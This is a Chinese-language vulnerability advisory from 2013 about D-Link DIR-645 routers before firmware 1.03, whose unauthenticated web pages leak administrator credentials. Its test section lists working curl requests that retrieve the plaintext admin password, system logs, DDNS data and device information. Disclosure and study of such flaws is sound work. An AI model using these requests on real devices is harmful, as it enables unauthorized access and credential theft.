发布日期:2013-02-28
更新日期:2013-03-05
受影响系统:
D-Link DIR-645 1.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58231
D-Link DIR-645是无线路由器。
运行固件1.03之前版本的D-Link DIR-645,其Web界面上存在无需身份验证的网页,可被未经身份验证的远程攻击者利用泄露管理凭证,包括明文密码等敏感信息。
<*来源:Roberto Paleari (roberto.paleari@emaze.net)
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Roberto Paleari (roberto.paleari@emaze.net)提供了如下测试方法:
获取管理员密码:
curl -d SERVICES=DEVICE.ACCOUNT <device ip>/getcfg.php
读取系统日志:
curl <device ip>/log_get.php
获取DDNS信息:
curl -d act=getreport <device ip>/ddns_act.php
转储设备信息:
curl <device ip>/DevInfo.php
建议:
--------------------------------------------------------------------------------
厂商补丁:
D-Link
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: